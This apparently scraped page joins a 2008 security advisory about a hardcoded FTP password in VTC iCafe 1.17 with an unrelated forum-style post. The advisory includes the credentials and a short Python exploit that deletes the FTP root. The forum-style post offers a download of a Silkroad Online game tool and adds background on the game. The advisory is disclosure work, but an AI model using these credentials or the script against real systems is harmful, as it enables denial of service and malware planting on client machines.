Title: Insecure default FTP password in VTC iCafe
Severity: Critical
Reporter: Blue Moon Consulting
Products: VTC iCafe 1.17
Fixed in: –
Description
VTC iCafe is an internet cafe management application. It uses a hardcoded insecure default FTP password VTCIntecom / VTCIntecom. The FTP server listens on port 6655 and distributes update files to the clients. A malicious user could use this knowledge to a) cause a denial of services on the clients by removing the FTP root directory, or b) place malwares such as virus, trojan on the client by replacing the update files.
Workaround
There is no workaround.
Fix
There is no fix at the moment. Customers are advised to contact the vendor for a proper fix.
Disclosure
Blue Moon Consulting adapts RFPolicy v2.0 in notifying vendors.
Initial vendor contact:
- August 12, 2008: Initial contact sent to support.icafe@vtc.vn
Vendor response:
Public disclosure:
Exploit code
import ftplib
ftp = ftplib.FTP()
ftp.connect(”localhost”, 6655)
ftp.login(”VTCIntecom”, “VTCIntecom”)
ftp.sendcmd(”RMD \x00″)
ftp.quit()
Disclaimer
The information provided in this advisory is provided “as is” without warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. Your use of the information on the advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time.
SROManager is a tool for Silkroad Online Vietnam. (view image for features)
Target: http://www.conduongtolua.com.vn/
Target Version: v1.036
Software version: v1.036p3
By: superkhung
More Information at GameVN Forum: http://forum.gamevn.com/showthread.php?t=484307
Here is screenshot:
Click here to download: (UnRar password is !fuck0ff)
Downloaded a total of 2407 times
Rapidshare Links: http://rapidshare.com/files/133973281/sro.manager.1002010808.rar.html
—-
Silkroad Online (also known as SRO Korean: 실크로드 온라인) is a free massively-multiplayer online role-playing game (MMORPG) created by the South Korean company Joymax, and was released for open beta testing on November 11, 2005. Much of the background of the game is based on the historical Silk Road. Unique from other MMORPGs, the game is centered on a triangular system of trading goods.
Silkroad Online is based on the history of trading in China along the Silk Road, a historical network of trade routes in Asia. The game attempts to reproduce the Silk Road in a much smaller scale, looking realistic and at the same time incorporating fantasy elements such as the use of special magical skills and abilities. One of the game’s most noted features is allowing players to choose three different job roles after their character achieves level 20.
The game currently has a level cap of 100 in the Korean version/Chinese version/Japanese versions, 90 in the Vietnamese version/International version.
The Korean, Chinese, and International version of Silkroad Online have released both the Chinese and European races and classes with a large map that includes both Asian and central European locations, such as Constantinople and Hotan. Different races also have access to different character abilities. On July 24, 2007, Joymax released an expansion of the game entitled “Silkroad Online Legends I, Europe.” The expanded game includes European architecture, characters, clothing, and whole new abilities for European in game race to use.
4
